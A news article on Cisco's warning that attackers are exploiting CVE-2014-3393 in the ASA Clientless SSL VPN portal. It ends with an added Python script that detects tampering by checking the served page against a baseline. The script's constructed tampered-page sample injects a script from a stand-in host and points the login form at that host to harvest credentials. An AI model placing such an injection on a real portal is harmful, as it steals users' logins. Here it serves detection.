Patch now: Cisco warns its firewall appliance is under attack

Cisco has warned customers that hackers are attacking unpatched versions of the software that runs its Adaptive Security Appliance (ASA) firewall.

Organisations using Cisco’s ASA firewall software are being urged to review a security update that the company released in October last year to address vulnerabilities in its ASA Clientless SSL VPN that exposed enterprises to remote attacks or could have allowed their infrastructure to serve up malware to others.

Cisco’s Product Security Incident Response Team (PSIRT) said on Wednesday that it is “aware of public exploitation of the Cisco ASA Clientless SSL VPN Portal Customization Integrity Vulnerability identified [as] CVE-2014-3393”.

“All customers that have customizations applied to their Clientless SSL VPN portal and regardless of the Cisco ASA Software release in use should review the security advisory and this blog post for additional remediation actions,” PSIRT incident manager Stefano De Crescenzo warned.

The vulnerability in the portal’s customization framework could allow an unauthenticated, remote attacker to modify its content, letting the attacker mount cross-site scripting attacks, steal credentials or distribute malware, De Crescenzo said.

“Once the portal is compromised, changes are persistent. Reloading the device or changing the Cisco ASA Software does not delete the customization objects,” he added.

Network security specialist Alec Stuart-Muirk demonstrated an attack on Cisco’s WebVPN Portal last October at the Ruxcon security conference, which exploited the fact that Cisco’s Adaptive Security Device Manager retained old code in new versions of the software and ran all customisations through a public-facing web browser.

The update that followed Stuart-Muirk’s presentation addressed 13 vulnerabilities in ASA, including two for its Clientless SSL VPN — one which could trigger information leaks or a denial of service and a second, demonstrated by Stuart-Muirk, that could expose the software to numerous attacks.

It’s the latter of the two issues that’s been under attack since at least February 11, according to Cisco.

The warning from Cisco’s PSIRT comes after an exploit script was made available in the Metasploit penetration testing database and on other internet web sites.

Systems that are affected will have Clientless SSL VPN portal functionality enabled and a “default customization object or a newly created customization object for Clientless SSL VPN portal has been previewed in ASDM”.
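Because tampered customization objects persist across reloads and software upgrades, a configuration review alone does not prove the portal is clean; the content the appliance actually serves should be compared against a known-good copy. The following is an added example (not from the article or from Cisco) of such a check: the baseline and tampered HTML are constructed for illustration, and the detection uses simple regex matching on script sources and form targets.

```python
import hashlib
import re

# Constructed baseline: the portal login page as captured when it was known good.
BASELINE_HTML = """<html><head><title>SSL VPN Service</title>
<script src="/+CSCOE+/portal.js"></script></head>
<body><form action="/+webvpn+/index.html" method="post">...</form></body></html>"""

# Constructed sample of a tampered page: an injected external script and a
# rewritten form target that would hand credentials to a third party.
TAMPERED_HTML = """<html><head><title>SSL VPN Service</title>
<script src="/+CSCOE+/portal.js"></script>
<script src="http://example.invalid/c.js"></script></head>
<body><form action="http://example.invalid/login" method="post">...</form></body></html>"""

SCRIPT_SRC = re.compile(r'<script[^>]+src=["\']([^"\']+)["\']', re.I)
FORM_ACTION = re.compile(r'<form[^>]+action=["\']([^"\']+)["\']', re.I)
OFF_BOX = ("http://", "https://", "//")


def sha256(text):
    return hashlib.sha256(text.encode()).hexdigest()


def check_portal(html, baseline_html):
    """Return a list of findings; an empty list means the page matches the baseline."""
    findings = []
    if sha256(html) != sha256(baseline_html):
        findings.append("content hash differs from baseline")
    known_scripts = set(SCRIPT_SRC.findall(baseline_html))
    for src in SCRIPT_SRC.findall(html):
        if src not in known_scripts:
            findings.append(f"unexpected script: {src}")
        if src.startswith(OFF_BOX):
            findings.append(f"external script: {src}")
    for action in FORM_ACTION.findall(html):
        # Portal forms should post back to the appliance itself, never to another host.
        if action.startswith(OFF_BOX):
            findings.append(f"form posts off-box: {action}")
    return findings


if __name__ == "__main__":
    print("baseline:", check_portal(BASELINE_HTML, BASELINE_HTML))
    for finding in check_portal(TAMPERED_HTML, BASELINE_HTML):
        print("ALERT:", finding)
```

In practice the baseline would be captured from the portal immediately after remediation and the check scheduled to run against the live login page, since a hash mismatch alone already warrants investigation.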

This article is brought to you by Enex TestLab, content directors for CSO Australia.
